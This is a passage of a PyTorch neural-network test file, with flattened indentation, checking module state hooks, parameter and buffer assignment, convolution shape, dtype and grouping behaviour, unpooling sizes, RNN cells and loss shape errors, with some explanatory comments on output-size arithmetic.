def __init__(self):
super().__init__()
def get_extra_state(self):
return {
'foo': 5
}
m = MyModule()
with self.assertRaisesRegex(RuntimeError, 'Unexpected key'):
m.load_state_dict(m.state_dict())
def test_extra_state_missing_get_extra_state(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
def set_extra_state(self, state):
pass
m = MyModule()
with self.assertRaisesRegex(RuntimeError, 'Missing key'):
m.load_state_dict(m.state_dict())
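# Taken together, the two tests above show the hooks must be overridden as a
# pair: get_extra_state without set_extra_state leaves the saved
# "_extra_state" entry unexpected on load, while set_extra_state without
# get_extra_state leaves that entry missing.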
def test_parameter_assignment(self):
l = nn.Linear(5, 5)
def num_params():
return len(list(l.parameters()))
self.assertEqual(num_params(), 2)
new_param = Parameter(torch.randn(5, 5))
l.param_name = new_param
self.assertEqual(num_params(), 3)
self.assertObjectIn(new_param, l.parameters())
var = torch.randn(5, 5)
l.var_name = var
self.assertEqual(num_params(), 3)
self.assertNotIn(id(var), map(id, l.parameters()))
# Make sure Variables are not saved as parameters
l.variable_attr = torch.empty(5, 5)
self.assertEqual(num_params(), 3)
l.param_attr = Parameter(torch.empty(5, 5))
self.assertEqual(num_params(), 4)
# It shouldn't be possible to replace a parameter with a Variable
def assign_var():
l.param_attr = torch.empty(5, 5)
self.assertRaises(TypeError, assign_var)
# But replacing it with None should be fine
l.param_attr = None
self.assertEqual(num_params(), 3)
def test_assignment(self):
l = nn.Module()
a = nn.Parameter(torch.randn(2))
b = nn.Parameter(torch.randn(3))
c = nn.Parameter(torch.randn(4))
q = nn.Linear(4, 4)
r = nn.Linear(5, 5)
w = nn.Linear(6, 6)
def test_assignments(get_list, a, b, c):
# Check that None can be shadowed
l.a = None
self.assertIsNone(l.a)
self.assertIn('a', l.__dict__)
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [a])
self.assertNotIn('a', l.__dict__)
# Assign second object
l.b = None
self.assertIsNone(l.b)
self.assertIn('b', l.__dict__)
l.b = b
self.assertIs(l.b, b)
self.assertEqual(get_list(), [a, b])
self.assertNotIn('b', l.__dict__)
# Remove and add the object back. Order should be unchanged.
l.a = None
self.assertIsNone(l.a)
self.assertEqual(get_list(), [b])
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [a, b])
# Replace object with another one. Order should be unchanged.
l.a = c
self.assertIs(l.a, c)
self.assertEqual(get_list(), [c, b])
# Remove and reassign an attribute. It should appear at the end of the list now.
del l.a
self.assertFalse(hasattr(l, 'a'))
l.a = a
self.assertIs(l.a, a)
self.assertEqual(get_list(), [b, a])
test_assignments(lambda: list(l.parameters()), a, b, c)
del l.a, l.b
self.assertEqual(list(l.parameters()), [])
test_assignments(lambda: list(l.children()), q, r, w)
del l.a, l.b
self.assertEqual(list(l.children()), [])
buf = torch.randn(10)
l.register_buffer('buf', buf)
self.assertIs(l.buf, buf)
l.buf = None
self.assertIs(l.buf, None)
self.assertNotIn('buf', l.__dict__) # should be stored in l._buffers
l.buf = buf
self.assertIn('buf', l.state_dict())
self.assertEqual(l.state_dict()['buf'], buf)
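# A minimal sketch, assuming the `persistent` flag of register_buffer: a
# non-persistent buffer behaves like `buf` above for attribute access and for
# named_buffers(), but is excluded from state_dict(), unlike the persistent
# default exercised above. (Helper name is ours; not collected as a test.)
def _buffer_persistence_sketch(self):
    m = nn.Module()
    m.register_buffer('kept', torch.randn(3))
    m.register_buffer('scratch', torch.zeros(3), persistent=False)
    self.assertIn('kept', m.state_dict())
    self.assertNotIn('scratch', m.state_dict())
    self.assertIn('scratch', dict(m.named_buffers()))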
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_thnn_conv_strided_padded_dilated(self):
for convfn, dims, transposed in (
(torch.nn.functional.conv2d, 2, False),
(torch.nn.functional.conv_transpose2d, 2, True),
(torch.nn.functional.conv3d, 3, False),
(torch.nn.functional.conv_transpose3d, 3, True)):
for stride, padding, dilation in (
(2, 0, 1), (1, 1, 1), (2, 1, 1), (1, 0, 2)):
kwargs = {"stride": stride, "padding": padding, "dilation": dilation}
inp_shape = (1, 2) + dims * (4,)
weight_shape = (2, 2) + dims * (1,)
inputs = torch.randn(inp_shape, dtype=torch.double, device="cuda", requires_grad=True)
weight = torch.randn(weight_shape, dtype=torch.double, device="cuda", requires_grad=True)
bias = torch.randn(2, dtype=torch.double, device="cuda", requires_grad=True)
with torch.backends.cudnn.flags(enabled=False):
res = convfn(inputs, weight, bias, **kwargs)
res_cpu = convfn(inputs.cpu(), weight.cpu(), bias.cpu(), **kwargs)
self.assertEqual(res, res_cpu)
with torch.backends.cudnn.flags(enabled=False):
torch.autograd.gradcheck(
lambda x, w, b: convfn(x, w, b, **kwargs),
(inputs, weight, bias)
)
torch.autograd.gradcheck(
lambda x, w, b: convfn(x, w, b, **kwargs),
(inputs.cpu(), weight.cpu(), bias.cpu())
)
def test_Conv2d_inconsistent_types(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float)
weights = torch.randn(1, 1, 3, 3, dtype=torch.double)
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_Conv2d_inconsistent_types_on_GPU_without_cudnn(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float, device="cuda")
weights = torch.randn(1, 1, 3, 3, dtype=torch.double, device="cuda")
bias = torch.randn(1, dtype=torch.double, device="cuda")
with torch.backends.cudnn.flags(enabled=False):
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights.float(), bias))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float(), bias.float())
def test_Conv2d_1x1(self):
in_channels = 2
out_channels = 2
mod = torch.nn.Conv2d(in_channels, out_channels, 1, bias=False).to(dtype=torch.double)
input = torch.randn(1, in_channels, 5, 5, requires_grad=True, dtype=torch.double)
for enabled in (False, True):
with torch.backends.mkldnn.flags(enabled=enabled):
gradcheck(F.conv2d, (input, mod.weight))
def test_Conv2d_OneDNN(self):
def run_once(group_val=24, dilation=1):
ifm = torch.ones([1, group_val, 6, 6], dtype=torch.float32)
weights = torch.ones([group_val, 1, 3, 3], dtype=torch.float32)
op = torch.nn.Conv2d(
in_channels=group_val,
out_channels=group_val,
kernel_size=[3, 3],
stride=[2, 2],
padding=[1, 1],
dilation=[dilation, dilation],
groups=group_val,
bias=False,
padding_mode='zeros'
)
op.weight.data = weights
res = op(ifm)
grad_in = torch.ones(res.shape, dtype=torch.float32)
res.backward(grad_in)
return op.weight.grad
for group_val in (24, 48, 23, 25):
for dilation in (1, 2):
with torch.backends.mkldnn.flags(enabled=False):
without_onednn = run_once(group_val, dilation)
with torch.backends.mkldnn.flags(enabled=True):
with_onednn = run_once(group_val, dilation)
self.assertEqual(without_onednn, with_onednn)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_cudnn_non_contiguous(self):
x = torch.randn(192, 16, 50).cuda()
x = x.permute(0, 2, 1).contiguous().permute(0, 2, 1)
m = torch.nn.Conv1d(
in_channels=16,
out_channels=32,
kernel_size=2,
bias=True).cuda()
result = m(x)  # smoke test: the non-contiguous input should not raise
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_Conv2d_inconsistent_types_on_GPU_with_cudnn(self):
inputs = torch.randn(4, 1, 7, 7, dtype=torch.float, device="cuda")
weights = torch.randn(1, 1, 3, 3, dtype=torch.double, device="cuda")
bias = torch.randn(1, dtype=torch.double, device="cuda")
with torch.backends.cudnn.flags(enabled=True):
# inconsistent types should raise an exception
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights))
self.assertRaises(RuntimeError, lambda: nn.functional.conv2d(inputs, weights.float(), bias))
# but it should work with the same type
nn.functional.conv2d(inputs.float(), weights.float(), bias.float())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_Conv2d_deterministic_cudnn(self, dtype=torch.float):
inputs = torch.randn(2, 3, 5, 5, device="cuda", dtype=dtype, requires_grad=True)
with cudnn.flags(enabled=True, benchmark=True, deterministic=True):
conv1 = torch.nn.Conv2d(3, 3, 3).to("cuda", dtype)
conv2 = torch.nn.Conv2d(3, 3, 3).to("cuda", dtype)
conv2.bias.data.copy_(conv1.bias.data)
conv2.weight.data.copy_(conv1.weight.data)
out1 = conv1(inputs)
out2 = conv2(inputs)
self.assertEqual(out1, out2, atol=0.0, rtol=0)
y = torch.randn(out1.size(), device="cuda", dtype=dtype)
out1.backward(y)
out2.backward(y)
self.assertEqual(conv1.bias.grad.data, conv2.bias.grad.data, atol=0.0, rtol=0)
self.assertEqual(conv1.weight.grad.data, conv2.weight.grad.data, atol=0.0, rtol=0)
def test_Conv2d_missing_argument(self):
c = nn.Conv2d(3, 3, 3)
self.assertRaises(TypeError, lambda: c(None))
def test_Conv2d_backward_twice(self):
input = torch.randn(2, 3, 5, 5)
c = nn.Conv2d(3, 3, 3)
o1 = c(input)
o1.sum().backward()
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: o1.sum().backward())
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
def test_Conv2d_large_workspace(self, dtype=torch.float):
# These sizes require huge cuDNN workspaces. Make sure we choose a
# reasonable algorithm that does not run out of memory
sizes = [
(1, 256, 109, 175),
(1, 256, 80, 128),
(1, 256, 120, 192),
]
def run_test(benchmark):
with torch.backends.cudnn.flags(benchmark=benchmark):
conv = torch.nn.Conv2d(256, 256, kernel_size=3, padding=1).to("cuda", dtype)
for size in sizes:
x = torch.randn(size, device="cuda", dtype=dtype)
out = conv(x.detach().clone().requires_grad_())
out.backward(torch.ones_like(out))
run_test(benchmark=False)
run_test(benchmark=True)
def test_conv_modules_raise_error_on_incorrect_input_size(self):
for dtype in [torch.bfloat16, torch.double, torch.float]:
modules = [nn.Conv1d(3, 8, 3).to(dtype), nn.ConvTranspose1d(3, 8, 3).to(dtype),
nn.Conv2d(3, 8, 3).to(dtype), nn.ConvTranspose2d(3, 8, 3).to(dtype),
nn.Conv3d(3, 8, 3).to(dtype), nn.ConvTranspose3d(3, 8, 3).to(dtype)]
invalid_input_dims = [(2, 4), (2, 4),
(3, 5), (3, 5),
(4, 6), (4, 6)]
for invalid_dims, module in zip(invalid_input_dims, modules):
for dims in invalid_dims:
input = torch.empty(torch.Size((3, ) * dims))
self.assertRaises(RuntimeError, lambda: module(input))
def test_conv_shapecheck(self):
def test(should_raise, module, input_size, dtype):
input = torch.empty(3, *input_size).to(dtype)
if should_raise:
self.assertRaises(RuntimeError, lambda: module(input))
else:
# just run it to ensure no exception raised.
module(input)
for dtype in [torch.bfloat16, torch.float, torch.double]:
# Conv1d
test(True, nn.Conv1d(1, 1, 3).to(dtype), (1, 2), dtype)
test(True, nn.Conv1d(1, 1, 3, stride=2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 2, stride=2).to(dtype), (1, 2), dtype)
test(False, nn.Conv1d(1, 1, 3, stride=2, padding=1).to(dtype), (1, 2), dtype)
# Conv2d
test(True, nn.Conv2d(1, 1, (3, 3)).to(dtype), (1, 2, 2), dtype)
test(False, nn.Conv2d(1, 1, (3, 3)).to(dtype), (1, 3, 3), dtype)
test(False, nn.Conv2d(1, 1, (3, 3), padding=1).to(dtype), (1, 2, 2), dtype)
# Conv3D
test(True, nn.Conv3d(1, 1, (3, 3, 3)).to(dtype), (1, 2, 2, 2), dtype)
test(False, nn.Conv3d(1, 1, (3, 3, 3)).to(dtype), (1, 3, 3, 3), dtype)
test(False, nn.Conv3d(1, 1, (3, 3, 3), padding=1).to(dtype), (1, 2, 2, 2), dtype)
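# The cases above follow the documented Conv1d shape rule; a sketch of that
# arithmetic (helper name is ours; not collected as a test):
# L_out = floor((L_in + 2*padding - dilation*(kernel_size - 1) - 1) / stride) + 1,
# and a RuntimeError is expected whenever L_out < 1. For example, kernel 3 on a
# length-2 input gives (2 - 2 - 1) // 1 + 1 = 0 (raises), kernel 2 gives
# (2 - 1 - 1) // 1 + 1 = 1 (passes), and kernel 3 with stride 2, padding 1
# gives (2 + 2 - 2 - 1) // 2 + 1 = 1 (passes).
def _conv1d_out_len_sketch(self, l_in, kernel_size, stride=1, padding=0, dilation=1):
    return (l_in + 2 * padding - dilation * (kernel_size - 1) - 1) // stride + 1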
def test_ConvTranspose2d_output_size(self):
m = nn.ConvTranspose2d(3, 4, 3, 3, 0, 2)
i = torch.randn(2, 3, 6, 6)
for h in range(15, 22):
for w in range(15, 22):
if 18 <= h <= 20 and 18 <= w <= 20:
output = m(i, output_size=(h, w))
self.assertEqual(output.size()[2:], (h, w))
else:
self.assertRaises(ValueError, lambda: m(i, (h, w)))
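# Why 18..20 above: per the documented ConvTranspose2d shape rule the minimum
# output is (H_in - 1)*stride - 2*padding + dilation*(kernel_size - 1) + 1
# = (6 - 1)*3 + 2 + 1 = 18, and an explicit output_size may exceed that by at
# most stride - 1 = 2 (the slack absorbed by output_padding), hence 18..20.
# A sketch of that range (helper name is ours; not collected as a test):
def _deconv_valid_range_sketch(self, h_in, kernel_size, stride, padding=0, dilation=1):
    min_out = (h_in - 1) * stride - 2 * padding + dilation * (kernel_size - 1) + 1
    return min_out, min_out + stride - 1  # inclusive bounds, (18, 20) here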
def test_ConvTranspose2d_output_size_downsample_upsample(self):
b, c, hid_c = 2, 3, 2
for h in range(13, 24):
for w in range(13, 17):
for k in range(2, 5):
for d in range(1, 5):
for s in range(1, 4):
for p in range(3):
conv = nn.Conv2d(
in_channels=c,
out_channels=hid_c,
kernel_size=k,
stride=s,
padding=p,
dilation=d,
)
t_conv = nn.ConvTranspose2d(
in_channels=hid_c,
out_channels=c,
kernel_size=k,
stride=s,
padding=p,
dilation=d,
)
i = torch.randn(b, c, h, w)
out = t_conv(conv(i), output_size=i.shape)
self.assertEqual(out.size()[2:], i.size()[2:])
def test_ConvTranspose3d_correct_output_size(self):
# Check that ConvTranspose3d can take a 5d output_size.
m = nn.ConvTranspose3d(2, 2, 2)
i = torch.rand(1, 2, 1, 1, 1)
out = m(i, output_size=(1, 2, 2, 2, 2))  # should not raise
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_ConvTranspose2d_half_cublas_gemm(self):
with torch.backends.cudnn.flags(enabled=False):
inputs = torch.randn(1, 1, 16, 16, device='cuda', dtype=torch.half)
deconv = nn.ConvTranspose2d(
1, 1, 3, stride=2, padding=1, output_padding=1).cuda().half()
output = deconv(inputs)
output.mean().backward()
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types([torch.half, torch.float])
def test_ConvTranspose2d_large_output_padding(self, dtype=torch.half):
net1 = torch.nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
net2 = torch.nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
net3 = torch.nn.ConvTranspose2d(32, 3, kernel_size=3, stride=2, padding=1, output_padding=1)\
.to(device='cuda', dtype=dtype)
x = torch.rand(1, 128, 6, 6, device='cuda', dtype=dtype, requires_grad=True)
x = net1(x)
x = net2(x)
x = net3(x)
x.backward(torch.randn_like(x))
torch.cuda.synchronize()
# For https://github.com/pytorch/pytorch/pull/1273
# Almost identical to the above `test_Conv2d_naive_groups`
@skipIfRocm
def test_Conv2d_groups_nobias(self):
dev_dtypes = [("cpu", torch.float)]
if TEST_CUDA:
dev_dtypes += [("cuda", torch.float), ("cuda", torch.half)]
if AMPERE_OR_ROCM:
dev_dtypes += [("cuda", torch.bfloat16)]
for device, dtype in dev_dtypes:
m = nn.Conv2d(4, 4, kernel_size=3, groups=2, bias=False).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 4, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 2, kernel_size=3, bias=False).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:2])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :2].contiguous())
m2 = nn.Conv2d(2, 2, kernel_size=3, bias=False).to(device, dtype)
m2.weight.data.copy_(m.weight.data[2:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 2:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=1e-1 if dtype == torch.half else dtype2prec_DONTUSE[dtype], rtol=0)
# Almost identical to the above `test_Conv2d_naive_groups`
# Covering special case when group > 1, input-channel / group < 16 and output-channel is multiple of 16
# See also https://github.com/pytorch/pytorch/pull/18463#issuecomment-476563686
# and https://github.com/pytorch/pytorch/pull/18463#issuecomment-477001024
@skipIfRocm
def test_Conv2d_groups_nobias_v2(self):
torch.manual_seed(123)
dev_dtypes = [("cpu", torch.float)]
if TEST_CUDA:
dev_dtypes += [("cuda", torch.float), ("cuda", torch.half)]
if AMPERE_OR_ROCM:
dev_dtypes += [("cuda", torch.bfloat16)]
for device, dtype in dev_dtypes:
m = nn.Conv2d(4, 16, kernel_size=3, groups=2, bias=False).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 8, kernel_size=3, bias=False).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv2d(2, 8, kernel_size=3, bias=False).to(device, dtype)
m2.weight.data.copy_(m.weight.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=1e-1 if dtype == torch.half else dtype2prec_DONTUSE[dtype], rtol=0)
# CPU-only test for group conv3d fast implementation using bmm
# See: https://github.com/pytorch/pytorch/pull/36355
def test_Conv3d_groups_nobias(self):
torch.manual_seed(123)
m = nn.Conv3d(4, 16, kernel_size=3, groups=2, bias=False).to("cpu", torch.float)
i = torch.randn(2, 4, 6, 6, 6, device="cpu", dtype=torch.float, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, 4, device="cpu", dtype=torch.float)
output.backward(grad_output)
m1 = nn.Conv3d(2, 8, kernel_size=3, bias=False).to("cpu", torch.float)
m1.weight.data.copy_(m.weight.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv3d(2, 8, kernel_size=3, bias=False).to("cpu", torch.float)
m2.weight.data.copy_(m.weight.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[torch.float], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float], rtol=dtype2prec_DONTUSE[torch.float])
def test_Conv3d_groups_wbias(self):
torch.manual_seed(123)
m = nn.Conv3d(4, 16, kernel_size=3, groups=2, bias=True).to("cpu", torch.float)
i = torch.randn(2, 4, 6, 6, 6, device="cpu", dtype=torch.float, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 16, 4, 4, 4, device="cpu", dtype=torch.float)
output.backward(grad_output)
m1 = nn.Conv3d(2, 8, kernel_size=3, bias=True).to("cpu", torch.float)
m1.weight.data.copy_(m.weight.data[:8])
m1.bias.data.copy_(m.bias.data[:8])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :8].contiguous())
m2 = nn.Conv3d(2, 8, kernel_size=3, bias=True).to("cpu", torch.float)
m2.weight.data.copy_(m.weight.data[8:])
m2.bias.data.copy_(m.bias.data[8:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 8:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[torch.float],
rtol=dtype2prec_DONTUSE[torch.float])
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float],
rtol=dtype2prec_DONTUSE[torch.float])
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data, m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[torch.float], rtol=dtype2prec_DONTUSE[torch.float])
# Very similar to test_Conv2d_naive_groups but with special care to handle
# the number of groups == number of input channels
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(ALL_TENSORTYPES)
@tf32_on_and_off(0.01)
def test_Conv2d_depthwise_naive_groups_cuda(self, dtype=torch.float):
for depth_multiplier in [1, 2]:
m = nn.Conv2d(2, 2 * depth_multiplier, kernel_size=3, groups=2).to("cuda", dtype)
i = torch.randn(2, 2, 6, 6, device="cuda", dtype=dtype).div_(2).requires_grad_()
output = m(i)
grad_output = torch.randn(2, 2 * depth_multiplier, 4, 4, device="cuda", dtype=dtype) / 2
output.backward(grad_output)
offset = 1 * depth_multiplier
m1 = nn.Conv2d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m1.weight.data = m.weight.data[:offset].clone()
m1.bias.data = m.bias.data[:offset].clone()
i1 = i.detach()[:, :1].clone().requires_grad_()
output1 = m1(i1)
output1.backward(grad_output[:, :offset].contiguous())
m2 = nn.Conv2d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m2.weight.data.copy_(m.weight.data[offset:])
m2.bias.data.copy_(m.bias.data[offset:])
i2 = i.detach()[:, 1:].clone().requires_grad_()
output2 = m2(i2)
output2.backward(grad_output[:, offset:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data,
m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data,
m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@repeat_test_for_types(ALL_TENSORTYPES)
@tf32_on_and_off(0.005)
def test_Conv3d_depthwise_naive_groups_cuda(self, dtype=torch.float):
for depth_multiplier in [1, 2]:
m = nn.Conv3d(2, 2 * depth_multiplier, kernel_size=3, groups=2).to("cuda", dtype)
i = torch.randn(2, 2, 6, 6, 6, device="cuda", dtype=dtype).div_(2).requires_grad_()
output = m(i)
grad_output = torch.randn(2, 2 * depth_multiplier, 4, 4, 4, device="cuda", dtype=dtype) / 2
output.backward(grad_output)
offset = 1 * depth_multiplier
m1 = nn.Conv3d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m1.weight.data = m.weight.data[:offset].clone()
m1.bias.data = m.bias.data[:offset].clone()
i1 = i.detach()[:, :1].clone().requires_grad_()
output1 = m1(i1)
output1.backward(grad_output[:, :offset].contiguous())
m2 = nn.Conv3d(1, 1 * depth_multiplier, kernel_size=3).to("cuda", dtype)
m2.weight.data.copy_(m.weight.data[offset:])
m2.bias.data.copy_(m.bias.data[offset:])
i2 = i.detach()[:, 1:].clone().requires_grad_()
output2 = m2(i2)
output2.backward(grad_output[:, offset:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data,
m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data,
m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
def test_MaxUnpool2d_output_size(self):
m = nn.MaxPool2d(3, stride=2, return_indices=True)
mu = nn.MaxUnpool2d(3, stride=2)
big_t = torch.rand(1, 1, 6, 6)
big_t[0][0][4][4] = 100
output_big, indices_big = m(big_t)
self.assertRaises(RuntimeError, lambda: mu(output_big, indices_big))
small_t = torch.rand(1, 1, 5, 5)
for i in range(0, 4, 2):
for j in range(0, 4, 2):
small_t[:, :, i, j] = 100
output_small, indices_small = m(small_t)
for h in range(3, 10):
for w in range(3, 10):
if 4 <= h <= 6 and 4 <= w <= 6:
size = (h, w)
if h == 6:
size = (1, 1) + size  # also exercise the 4-dimensional output_size form
mu(output_small, indices_small, output_size=size)
else:
self.assertRaises(ValueError, lambda: mu(output_small, indices_small, (h, w)))
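# Why 4..6 above, as a sketch (assuming the tolerance checked is one stride on
# either side of the default): the default unpooled size is
# (H_pool - 1)*stride - 2*padding + kernel_size = (2 - 1)*2 + 3 = 5, and an
# explicit output_size must lie strictly between default - stride and
# default + stride. (Helper name is ours; not collected as a test.)
def _unpool_valid_range_sketch(self, pooled, kernel_size, stride, padding=0):
    default = (pooled - 1) * stride - 2 * padding + kernel_size
    return default - stride + 1, default + stride - 1  # inclusive, (4, 6) here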
def test_max_unpool2d_nhwc_cpu(self):
input = torch.randn(2, 10, 9, 9).float().cpu()
input = input.contiguous(memory_format=torch.channels_last)
ref_input = input.clone().contiguous()
pool = nn.MaxPool2d(3, stride=2, return_indices=True).cpu()
ref_pool = nn.MaxPool2d(3, stride=2, return_indices=True).cpu()
out, ind = pool(input)
ref_out, ref_ind = ref_pool(ref_input)
out.requires_grad_()
ref_out.requires_grad_()
unpool = nn.MaxUnpool2d(3, stride=2).cpu()
ref_unpool = nn.MaxUnpool2d(3, stride=2).cpu()
upout = unpool(out, ind)
ref_upout = ref_unpool(ref_out, ref_ind)
grad = torch.randn(upout.size()).float().cpu()
grad = grad.contiguous(memory_format=torch.channels_last)
ref_grad = grad.clone().contiguous()
upout.backward(grad)
ref_upout.backward(ref_grad)
self.assertTrue(upout.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_upout.is_contiguous())
self.assertTrue(torch.allclose(upout, ref_upout))
self.assertTrue(torch.allclose(out.grad, ref_out.grad))
def test_container_copy(self):
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = nn.Linear(4, 5)
def forward(self, input):
return self.linear(input)
input = torch.randn(2, 4)
model = Model()
model_cp = deepcopy(model)
self.assertEqual(model(input).data, model_cp(input).data)
model_cp.linear.weight.data[:] = 2
self.assertNotEqual(model(input).data, model_cp(input).data)
def test_RNN_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
for module in (nn.RNNCell, nn.GRUCell):
for bias in (True, False):
input = torch.randn(3, 10)
hx = torch.randn(3, 20)
cell = module(10, 20, bias=bias)
for _ in range(6):
hx = cell(input, hx)
hx.sum().backward()
def test_RNN_cell_forward_input_size(self):
input = torch.randn(3, 11)
hx = torch.randn(3, 20)
for module in (nn.RNNCell, nn.GRUCell):
cell = module(10, 20)
self.assertRaises(Exception, lambda: cell(input, hx))
def test_RNN_cell_forward_hidden_size(self):
input = torch.randn(3, 10)
hx = torch.randn(3, 21)
cell_shared_param = (10, 20)
for cell in (nn.RNNCell(*cell_shared_param, nonlinearity="relu"),
nn.RNNCell(*cell_shared_param, nonlinearity="tanh"),
nn.GRUCell(*cell_shared_param)):
self.assertRaises(Exception, lambda: cell(input, hx))
def _test_loss_equal_input_target_shape(self, cast):
# Tests losses whose inputs should have the same size.
losses = {
'mse_loss': lambda x, y: F.mse_loss(x, y),
'l1_loss': lambda x, y: F.l1_loss(x, y),
'smooth_l1_loss': lambda x, y: F.smooth_l1_loss(x, y),
'huber_loss': lambda x, y: F.huber_loss(x, y),
'kl_div': lambda x, y: F.kl_div(x, y),
'poisson_nll_loss': lambda x, y: F.poisson_nll_loss(x, y),
}
input = cast(torch.randn(3, 5))
target = cast(torch.randn(5, 3))
for _name, fn in losses.items():
self.assertRaises(Exception, lambda: fn(input, target))
